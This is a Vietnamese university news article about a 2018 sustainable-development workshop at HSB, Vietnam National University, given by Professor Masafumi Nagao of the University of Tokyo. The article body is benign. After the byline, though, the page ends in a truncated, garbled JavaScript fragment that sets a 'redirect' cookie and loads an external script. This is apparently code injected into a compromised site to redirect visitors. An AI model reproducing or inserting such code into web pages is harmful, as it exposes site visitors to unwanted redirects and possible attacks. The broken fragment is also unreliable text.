Hội thảo về phát triển bền vững của Giáo sư Nhật Bản tại HSB

HSB-hoi-thao-Phat-trien-ben-vung-2Hội thảo nằm trong khuôn khổ phát triển đội ngũ giảng viên trẻ và tuyển chọn nghiên cứu sinh chương trình Tiến sĩ Quản trị và phát triển bền vững của Khoa Quản trị và Kinh doanh.

Ngày 23/9/2018, Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN hân hạnh được tiếp đón Giáo sư Masafumi Nagao thuộc Viện nghiên cứu tiên tiến về tính bền vững, ĐH Tokyo, Nhật Bản; Tiến sĩ Ryo Sasaki – chuyên gia đánh giá, lập kế hoạch chiến lược cho các tổ chức đào tạo, tới trao đổi các vấn đề liên quan đến Phát triển bền vững chức giáo dục đại học.

Hội thảo nằm trong khuôn khổ phát triển đội ngũ giảng viên trẻ và tuyển chọn nghiên cứu sinh chương trình Tiến sĩ Quản trị và phát triển bền vững của Khoa Quản trị và Kinh doanh.

Tại buổi hội thảo, GS.Masafumi Nagao đã trao đổi với các giảng viên trẻ về những nền tảng cơ bản của khoa học phát triển bền vững cũng như một số thay đổi đáng kể trong việc áp dụng các mục tiêu phát triển bền vững. Theo đó có việc chuyển từ đào tạo đơn, đa ngành sang chuyên ngành trọng điểm và hợp tác quốc tế.

GS.Masafumi Nagao nhấn mạnh, các đơn vị đào tạo cần chủ động xây dựng lực lượng giảng viên trẻ, các nhà nghiên cứu, các doanh nhân có tư duy đổi mới, khả năng lãnh đạo và năng lực khoa học tiên tiến để đóng góp cho nhu cầu về tính bền vững toàn cầu.

Trong xu thế quốc tế về phát triển bền vững, giáo dục học đại học đứng trước nhiều thử thách mới. Các cơ sở giáo dục đại học cần phải thực hiện các cải tiến chức năng, cơ cấu và thể chế để đáp ứng các thách thức. Điều này đòi hỏi sự chuyển đổi lớn về cấu trúc nội bộ của các tổ chức và cũng phát triển các mối quan hệ hợp tác làm việc với các bên liên quan, thử nghiệm các phương pháp tiếp cận liên ngành.

HSB-hoi-thao-Phat-trien-ben-vung-2

Giáo sư Masafumi Nagao hiện đang công tác tại Viện nghiên cứu tiên tiến về tính bền vững, ĐH Tokyo, Giáo sư tại Đại học Hiroshima, Giáo sư dự án tại Đại học Tokyo về khoa học bền vững, Tham vấn giáo sư và cố vấn chương trình cấp cao tại UNU-IAS; điều phối sự hợp tác giữa các trường đại học để phát triển bền vững trong 8 trường đại học châu Phi; trưởng nhóm hỗ trợ ADB cho VASS. Chương trình làm việc tại Khoa Quản trị và Kinh doanh của Giáo sư Masafumi Nagao mở ra nhiều cơ hội hợp tác mới của HSB và các trường ĐH tại Nhật Bản cũng như các trường quốc tế về lĩnh vực quản trị và phát triển bền vững.

Nguyên Minh

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’